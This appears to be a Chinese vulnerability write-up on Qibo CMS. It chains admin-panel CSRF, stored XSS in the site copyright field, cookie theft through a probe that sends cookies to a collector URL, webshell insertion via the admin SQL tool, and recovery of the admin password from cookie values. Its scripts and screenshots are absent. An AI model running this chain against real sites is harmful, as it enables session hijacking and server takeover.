qibo通杀csrf+存储xss+分析明文账号密码进后台+成功getshell

后台无csrf防御,首先,看下全局过滤。全局过滤目录结构admin/index.php-admin/global.php-inc/common.inc.php这里是重点

综上:post,get,cookie过来的参数进行过滤,但是没有过滤xss过滤。对eval进行替换但是还有别的函数有同样功能,还是可以插入一句话进去
csrf:后台-系统功能-全局参数设置
利用脚本:1.php

参数webdbs[copyright]是网页底部版权信息。在前台的每个页面都会出现。
http://127.0.0.1/xss/probe.js 这是我本地的探针 调用本地xss探针probe,js。探针里http_server = “http://127.0.0.1/3/test.php?c=”,可以在服务器。test接收参数C,生成页面probe_data.html.写入接收到的数据。cookie就在里面。
管理员在登录状态下访问主站任何页面都会中招。获取到的cookie如下:
cookie

1
编辑之后刷新页面。
2
这样是可以成功登陆前台的,登陆后台需要Admin,adminID,passport同样方式编辑,刷新之后
然后进入后台。
点击服务器信息。看到网站绝对路径 DOCUMENT_ROOT D:/wamp/wamp/www/
系统功能-数据库工具
3
输入sql语句:

4
成功插入一句话。菜刀连接
6
其实xss获取到的cookie有一定时间的,但是我们可以从获取到cookie来推算原本的账号密码。
inc\common.inc.php

可知$detail经过\t分隔之后为uid username,password.

计算mymd5($_COOKIE[“adminID”],’DE’,$onlineip)

看mymd5()函数-是加密解密函数:

7

得:
8
密码为MD5加密,解密为admin 用户名passport第二个参数admin

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录